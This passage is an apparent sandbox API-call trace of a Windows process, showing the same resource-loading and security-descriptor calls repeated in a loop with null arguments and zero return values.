(hResData=0x0) returned 0 [0219.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.944] LockResource (hResData=0x0) returned 0x0 [0219.944] FreeResource (hResData=0x0) returned 0 [0219.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.945] FreeResource (hResData=0x0) returned 0 [0219.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.945] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.946] FreeResource (hResData=0x0) returned 0 [0219.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.946] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.947] LockResource (hResData=0x0) returned 0x0 [0219.947] FreeResource (hResData=0x0) returned 0 [0219.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.948] LockResource (hResData=0x0) returned 0x0 [0219.948] FreeResource (hResData=0x0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: 